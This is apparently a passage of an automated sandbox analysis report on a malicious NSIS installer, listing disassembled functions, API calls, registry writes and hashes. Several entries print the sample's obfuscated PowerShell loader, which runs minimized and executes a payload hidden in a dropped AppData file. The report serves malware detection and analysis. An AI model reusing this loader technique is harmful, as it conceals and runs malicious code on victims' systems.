                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,00000000,00000000,00000031), ref: 0040177E
                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,00000000,00000000,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,00000000,00000000,00000031), ref: 004017A8
                                                                                                                                              • Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Originals Setup,NSIS Error), ref: 00405BCA
                                                                                                                                              • Part of subcall function 00404EA6: lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
                                                                                                                                              • Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
                                                                                                                                              • Part of subcall function 00404EA6: lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
                                                                                                                                              • Part of subcall function 00404EA6: SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                            • String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek$noncontamination\lftebevgelse\
                                                                                                                                            • API String ID: 1941528284-867135988
                                                                                                                                            • Opcode ID: eb6225978e445b6639c7fe847b1e005be462a1abc08e94cdbcc89d5a2522d826
                                                                                                                                            • Instruction ID: 209590ddbc3a68456c4598a6b25cf33bb68440e8bdc93e33a46783fb3c58ae9b
                                                                                                                                            • Opcode Fuzzy Hash: eb6225978e445b6639c7fe847b1e005be462a1abc08e94cdbcc89d5a2522d826
                                                                                                                                            • Instruction Fuzzy Hash: 6F41C472900514BADF10BBA9DC46EAF3679EF01368F20823BF512F10E1D77C5A418AAD
                                                                                                                                            Function 00404EA6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 539 404ea6-404ebb 540 404f71-404f75 539->540 541 404ec1-404ed3 539->541 542 404ed5-404ed9 call 405bdf 541->542 543 404ede-404eea lstrlenA 541->543 542->543 545 404f07-404f0b 543->545 546 404eec-404efc lstrlenA 543->546 548 404f1a-404f1e 545->548 549 404f0d-404f14 SetWindowTextA 545->549 546->540 547 404efe-404f02 lstrcatA 546->547 547->545 550 404f20-404f62 SendMessageA * 3 548->550 551 404f64-404f66 548->551 549->548 550->551 551->540 552 404f68-404f6b 551->552 552->540
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
                                                                                                                                            • lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
                                                                                                                                            • lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
                                                                                                                                            • SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
                                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
                                                                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
                                                                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                            • String ID: Completed
                                                                                                                                            • API String ID: 2531174081-3087654605
                                                                                                                                            • Opcode ID: 42d41b05157e019d59a8c95eb738bd9c3ef6bfcc5de6f75fe76b0678c24a36e0
                                                                                                                                            • Instruction ID: c9e29023339c79119f92ef6614343089cfde3ac0fe0689c8293f17bbb72fca3e
                                                                                                                                            • Opcode Fuzzy Hash: 42d41b05157e019d59a8c95eb738bd9c3ef6bfcc5de6f75fe76b0678c24a36e0
                                                                                                                                            • Instruction Fuzzy Hash: D0219DB2900118BEDF119FA5CD849DEBFB9EF44354F14807AF944B6291C3789E418BA8
                                                                                                                                            Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 553 402e62-402e76 554 402e78 553->554 555 402e7f-402e87 553->555 554->555 556 402e89 555->556 557 402e8e-402e93 555->557 556->557 558 402ea3-402eb0 call 403055 557->558 559 402e95-402e9e call 40306b 557->559 563 403000 558->563 564 402eb6-402eba 558->564 559->558 565 403002-403003 563->565 566 402ec0-402ee0 GetTickCount call 405fc8 564->566 567 402fe9-402feb 564->567 569 40304e-403052 565->569 578 402ee6-402eee 566->578 579 40304b 566->579 570 403040-403044 567->570 571 402fed-402ff0 567->571 573 403005-40300b 570->573 574 403046 570->574 575 402ff2 571->575 576 402ff5-402ffe call 403055 571->576 580 403010-40301e call 403055 573->580 581 40300d 573->581 574->579 575->576 576->563 586 403048 576->586 583 402ef0 578->583 584 402ef3-402f01 call 403055 578->584 579->569 580->563 590 403020-403033 WriteFile 580->590 581->580 583->584 584->563 591 402f07-402f10 584->591 586->579 592 402fe5-402fe7 590->592 593 403035-403038 590->593 594 402f16-402f33 call 405fe8 591->594 592->565 593->592 595 40303a-40303d 593->595 598 402fe1-402fe3 594->598 599 402f39-402f50 GetTickCount 594->599 595->570 598->565 600 402f52-402f5a 599->600 601 402f95-402f99 599->601 604 402f62-402f8d MulDiv wsprintfA call 404ea6 600->604 605 402f5c-402f60 600->605 602 402fd6-402fd9 601->602 603 402f9b-402f9e 601->603 602->578 608 402fdf 602->608 606 402fa0-402fb2 WriteFile 603->606 607 402fbe-402fc4 603->607 610 402f92 604->610 605->601 605->604 606->592 611 402fb4-402fb7 606->611 612 402fca-402fce 607->612 608->579 610->601 611->592 613 402fb9-402fbc 611->613 612->594 614 402fd4 612->614 613->612 614->579
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC0
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402F41
                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F6E
                                                                                                                                            • wsprintfA.USER32 ref: 00402F7E
                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,0040E888,00000000,00000000), ref: 00402FAA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountTick$FileWritewsprintf
                                                                                                                                            • String ID: ... %d%%
                                                                                                                                            • API String ID: 4209647438-2449383134
                                                                                                                                            • Opcode ID: 59f1a083d79aa0a26b558a3a335eceb6c969644405dc0bbbd3de2fd8fa687a46
                                                                                                                                            • Instruction ID: 884de2ce8814a110384bf9455658e7085e50030da519773910f3f0b9c7b3960d
                                                                                                                                            • Opcode Fuzzy Hash: 59f1a083d79aa0a26b558a3a335eceb6c969644405dc0bbbd3de2fd8fa687a46
                                                                                                                                            • Instruction Fuzzy Hash: 49519D7190120AABCF10DF65DA08A9F3BB8AB04395F14413BF800B72C0C7789E50DBAA
                                                                                                                                            Function 00401F68 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 615 401f68-401f74 616 401f7a-401f90 call 4029fd * 2 615->616 617 40202f-402031 615->617 626 401f92-401f9d GetModuleHandleA 616->626 627 401f9f-401fad LoadLibraryExA 616->627 619 40217c-402181 call 401423 617->619 625 402892-4028a1 619->625 626->627 629 401faf-401fbc GetProcAddress 626->629 627->629 630 402028-40202a 627->630 632 401ffb-402000 call 404ea6 629->632 633 401fbe-401fc4 629->633 630->619 637 402005-402008 632->637 635 401fc6-401fd2 call 401423 633->635 636 401fdd-401ff9 633->636 635->637 646 401fd4-401fdb 635->646 636->637 637->625 640 40200e-402016 call 4035ae 637->640 640->625 645 40201c-402023 FreeLibrary 640->645 645->625 646->637
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                                                                                                              • Part of subcall function 00404EA6: lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
                                                                                                                                              • Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
                                                                                                                                              • Part of subcall function 00404EA6: lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
                                                                                                                                              • Part of subcall function 00404EA6: SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
                                                                                                                                              • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
                                                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                                            Strings
                                                                                                                                            • `7B, xrefs: 00401FDD
                                                                                                                                            • "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , xrefs: 00401FE7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                            • String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $`7B
                                                                                                                                            • API String ID: 2987980305-3854630374
                                                                                                                                            • Opcode ID: 6dc7458dcee08963799a638f2a333defd2c134256b54f09a04e7196953954384
                                                                                                                                            • Instruction ID: aaf5afebff6e040c8f3edcccfb20df8df5b0ecb9331c565b7beb057a01dbb2d2
                                                                                                                                            • Opcode Fuzzy Hash: 6dc7458dcee08963799a638f2a333defd2c134256b54f09a04e7196953954384
                                                                                                                                            • Instruction Fuzzy Hash: 9121F672904211B6CF107FA48E8DA6E39B0AB44318F20823BF600B62D0D7BC4941DA5E
                                                                                                                                            Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 647 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 654 402892-4028a1 647->654 655 402368-402370 647->655 656 402380-402383 655->656 657 402372-40237f call 4029fd lstrlenA 655->657 660 402393-402396 656->660 661 402385-402392 call 4029e0 656->661 657->656 665 4023a7-4023bb RegSetValueExA 660->665 666 402398-4023a2 call 402e62 660->666 661->660 669 4023c0-402496 RegCloseKey 665->669 670 4023bd 665->670 666->665 669->654 670->669
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                                                            • lstrlenA.KERNEL32(noncontamination\lftebevgelse\,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,noncontamination\lftebevgelse\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,noncontamination\lftebevgelse\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                                                            • String ID: noncontamination\lftebevgelse\
                                                                                                                                            • API String ID: 1356686001-3804711476
                                                                                                                                            • Opcode ID: bbf6a0b86b811ae7a9c2ce5d094f6befe46c2cc4ac6501f1fa9dc908f8b818e4
                                                                                                                                            • Instruction ID: 3a938b5a8607202095c76e83426e5805640bb3b53fc5f2f09a26eea3e9d8e973
                                                                                                                                            • Opcode Fuzzy Hash: bbf6a0b86b811ae7a9c2ce5d094f6befe46c2cc4ac6501f1fa9dc908f8b818e4
                                                                                                                                            • Instruction Fuzzy Hash: 7711A2B1E00118BFEB10AFA4DE49EAF7678FB50358F10413AF905B61D1D7B86D01AA69
                                                                                                                                            Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 672 4015b3-4015c6 call 4029fd call 4056e6 677 4015c8-4015e3 call 405678 CreateDirectoryA 672->677 678 40160a-40160d 672->678 685 401600-401608 677->685 686 4015e5-4015f0 GetLastError 677->686 680 401638-402181 call 401423 678->680 681 40160f-40162a call 401423 call 405bbd SetCurrentDirectoryA 678->681 693 402892-4028a1 680->693 681->693 695 401630-401633 681->695 685->677 685->678 689 4015f2-4015fb GetFileAttributesA 686->689 690 4015fd 686->690 689->685 689->690 690->685 695->693
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004056E6: CharNextA.USER32(?,?,004210E0,?,00405752,004210E0,004210E0,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004056F4
                                                                                                                                              • Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 004056F9
                                                                                                                                              • Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 0040570D
                                                                                                                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens, xrefs: 00401617
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens
                                                                                                                                            • API String ID: 3751793516-2870171211
                                                                                                                                            • Opcode ID: 341913b46653dc02a6b8c0ff5df98e195c602d220a8259587814e8818c9eeb9b
                                                                                                                                            • Instruction ID: d075d57f09c15f05164e6e7227da82a4385631acf0310a11cf010d3362af65ee
                                                                                                                                            • Opcode Fuzzy Hash: 341913b46653dc02a6b8c0ff5df98e195c602d220a8259587814e8818c9eeb9b
                                                                                                                                            • Instruction Fuzzy Hash: 5F112531908150AFDB112F755D44E6F37B0EA62366768473BF891B22E2D23C0D42D62E
                                                                                                                                            Function 0040587D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 698 40587d-405887 699 405888-4058b3 GetTickCount GetTempFileNameA 698->699 700 4058c2-4058c4 699->700 701 4058b5-4058b7 699->701 702 4058bc-4058bf 700->702 701->699 703 4058b9 701->703 703->702
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405891
                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004058AB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                            • API String ID: 1716503409-4029073079
                                                                                                                                            • Opcode ID: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
                                                                                                                                            • Instruction ID: 97602d992a1fc3ea541738fe691a17a98ed12bbd3b61733a4c4fd0f0c3479bd5
                                                                                                                                            • Opcode Fuzzy Hash: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
                                                                                                                                            • Instruction Fuzzy Hash: B0F05E367482086AEB109A55DC44B9B7B98DB91750F14C02AFD44AA190D6B099548B99
                                                                                                                                            Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 704 401edc-401f00 call 4029fd GetFileVersionInfoSizeA 707 402892-4028a1 704->707 708 401f06-401f14 GlobalAlloc 704->708 708->707 709 401f1a-401f29 GetFileVersionInfoA 708->709 711 401f2b-401f42 VerQueryValueA 709->711 712 401f5f 709->712 711->712 714 401f44-401f5c call 405b1b * 2 711->714 712->707 714->712
                                                                                                                                            APIs
                                                                                                                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                                                            • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                                              • Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
